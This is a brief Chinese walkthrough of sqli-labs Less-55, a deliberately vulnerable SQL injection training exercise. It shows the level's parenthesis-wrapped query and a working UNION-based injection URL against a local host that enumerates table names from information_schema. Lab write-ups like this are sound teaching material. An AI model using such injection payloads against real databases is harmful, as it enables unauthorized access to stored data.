Sqli-labs less 55

Less-55

本关的sql语句为:

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

其余和less54是一样的,所以我们将上述的语句前添加 ) 即可,但是这里要求次数为14次。

示例payload:

http://127.0.0.1/sqli-labs/Less-55/?id=-1)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

原文地址:https://www.cnblogs.com/lcamry/p/5762660.html